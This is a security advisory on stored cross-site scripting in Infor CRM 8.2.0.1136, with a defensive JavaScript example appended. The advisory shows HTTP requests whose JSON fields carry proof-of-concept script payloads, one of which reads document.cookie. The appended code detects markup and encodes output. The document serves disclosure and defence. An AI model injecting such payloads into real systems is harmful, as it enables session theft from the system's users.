
Infor CRM 8.2.0.1136 Cross Site Scripting

26 Feb 2016. Reported by LiquidWorm. Type: packetstorm. Source: packetstormsecurity.com

Infor CRM 8.2.0.1136 Multiple Cross-Site Scripting Vulnerabilities in JSON Parameter

Code
`  
Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities  
  
  
Vendor: Infor  
Product web page: http://www.infor.com  
Affected version: 8.2.0.1136  
  
  
Summary: Infor® CRM, formerly Saleslogix, is an award-winning  
customer relationship management (CRM) solution that provides  
a complete view of customer interactions, so your business can  
collaborate and respond promptly and knowledgeably to customer  
inquiries, sales opportunities, and service requests. Infor CRM  
includes a robust suite of sales, marketing, and service capabilities,  
to offer businesses of all sizes a fast, flexible, and affordable  
solution for finding, winning, and growing profitable customer  
relationships.  
  
Desc: Infor CRM suffers from multiple stored cross-site scripting  
vulnerabilities. Input passed to several POST/PUT parameters in  
JSON format is not properly sanitised before being returned to the  
user. This can be exploited to execute arbitrary HTML and script  
code in a user's browser session in the context of an affected site.  
  
Tested on: Microsoft-IIS/8.5  
ASP.NET/4.0.30319  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5308  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php  
  
  
21.01.2016  
  
---  
  
  
----------------------------------  
Affected parameter(s): description  
----------------------------------  
  
PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1  
Host: intranet.zeroscience.mk  
  
{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}  
"": ""  
$descriptor: ""  
$etag: "+CgjMLB+0nA="  
$httpStatus: 200  
$key: "eUSERA0004IX"  
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"  
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"  
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"  
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"  
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"  
$updated: "/Date(1456359095000)/"  
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"  
accountId: null  
activityId: null  
attachDate: "2016-01-25T00:09:39Z"  
contactId: null  
contractId: null  
createDate: "/Date(1456359095000)/"  
createUser: "UUSERA0005W0"  
dataType: "R"  
defectId: null  
description: "<img src=j onerror=confirm(document.cookie) >"  
details: {createSource: null}  
documentType: null  
fileExists: true  
fileName: "inforcrm_xss.png"  
fileSize: 101722  
historyId: null  
leadId: null  
modifyDate: "/Date(1456359095000)/"  
modifyUser: "UUSERA0005W0"  
opportunityId: null  
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"  
productId: null  
remoteStatus: null  
returnId: null  
salesOrderId: null  
ticketId: null  
url: null  
user: {$key: "UUSERA0005W0"}  
  
  
  
-----------------------------------------------------------  
Affected parameter(s): Description, Location, and LongNotes  
-----------------------------------------------------------  
  
POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1  
Host: intranet.zeroscience.mk  
  
{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}  
$descriptor: ""  
$httpStatus: 200  
AccountId: null  
AccountName: null  
ActivityAttendees: {}  
ActivityBasedOn: null  
Alarm: false  
AlarmTime: "2016-01-24T22:45:00Z"  
AllowAdd: true  
AllowComplete: true  
AllowDelete: true  
AllowEdit: true  
AllowSync: true  
AppId: null  
Attachment: false  
AttachmentCount: null  
AttendeeCount: 0  
Category: "Pleasantville"  
ContactId: null  
ContactName: null  
CreateDate: "/Date(-62135596800000)/"  
CreateUser: null  
Description: "<img src=zsl onerror=prompt(1) >"  
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}  
ChangeKey: null  
CreateSource: null  
ForeignId1: null  
ForeignId2: null  
ForeignId3: null  
ForeignId4: null  
GlobalSyncId: null  
ProjectId: null  
Tick: null  
UserDef1: null  
UserDef2: null  
UserDef3: null  
Duration: "0"  
EndDate: "/Date(1456359315286)/"  
LeadId: null  
LeadName: null  
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}  
$descriptor: "Userovich, User"  
$key: "UUSERA0005W0"  
Location: "<img src=zsl onerror=prompt(2) >"  
LongNotes: "<img src=zsl onerror=prompt(3) >"  
ModifyDate: "/Date(-62135596800000)/"  
ModifyUser: null  
Notes: "Zero Science Lab"  
OpportunityId: null  
OpportunityName: null  
OriginalDate: "/Date(1456358415286)/"  
PhoneNumber: null  
Priority: "1"  
ProcessId: null  
ProcessNode: null  
RecurIterations: 0  
RecurPeriod: 0  
RecurPeriodSpec: 0  
RecurSkip: null  
RecurrenceState: "rsNotRecurring"  
Recurring: false  
Resources: {}  
Rollover: false  
StartDate: "2016-01-25T00:00:05Z"  
TicketId: null  
TicketNumber: null  
Timeless: true  
Type: "atToDo"  
UserActivities: {}  
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"  
UserNotifications: {}  
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"  
`
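
The advisory attributes the issue to JSON field values being returned to the user without sanitisation. The JavaScript below is an added example, not part of the advisory and not Infor's code: it flags tag-like content in any string field of a parsed request body and HTML-encodes the free-text fields at render time. The field names and the sample `Description` value come from the advisory; the function names, the `<dt>/<dd>` rendering and the rest of the sample record are assumptions made for illustration.

```javascript
// Free-text fields named in the advisory (attachments and activities endpoints).
const FREE_TEXT_FIELDS = ["description", "Description", "Location", "LongNotes"];

// Characters that must be encoded before text is placed in HTML element or attribute context.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// A "<" followed by a letter, "/" or "!" starts a tag, a closing tag or a comment.
const TAG_START = /<[a-zA-Z\/!]/;

// Walk a parsed JSON body (nested objects and arrays) and return the path of
// every string value that contains tag-like content, for rejection or logging.
function findMarkup(node, path = "$") {
  if (typeof node === "string") return TAG_START.test(node) ? [path] : [];
  if (node === null || typeof node !== "object") return [];
  return Object.entries(node).flatMap(([key, child]) =>
    findMarkup(child, Array.isArray(node) ? `${path}[${key}]` : `${path}.${key}`));
}

// Render the free-text fields with every name and value encoded, so stored
// markup is displayed as text instead of being parsed by the browser.
function renderRecord(record, fields = FREE_TEXT_FIELDS) {
  return fields
    .filter((name) => typeof record[name] === "string")
    .map((name) => `<dt>${escapeHtml(name)}</dt><dd>${escapeHtml(record[name])}</dd>`)
    .join("");
}

// Constructed sample shaped like the activity record shown in the advisory.
const sample = {
  Category: "Pleasantville",
  Description: "<img src=zsl onerror=prompt(1) >",
  Location: "Room 4 & 5",
  Notes: "Zero Science Lab",
  Leader: { $key: "UUSERA0005W0", $descriptor: "Userovich, User" },
};

console.log(findMarkup(sample));
console.log(renderRecord(sample));
```

Encoding at output is the control that closes the stored XSS; the markup check is a secondary input-side filter and a useful signal for server logs.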
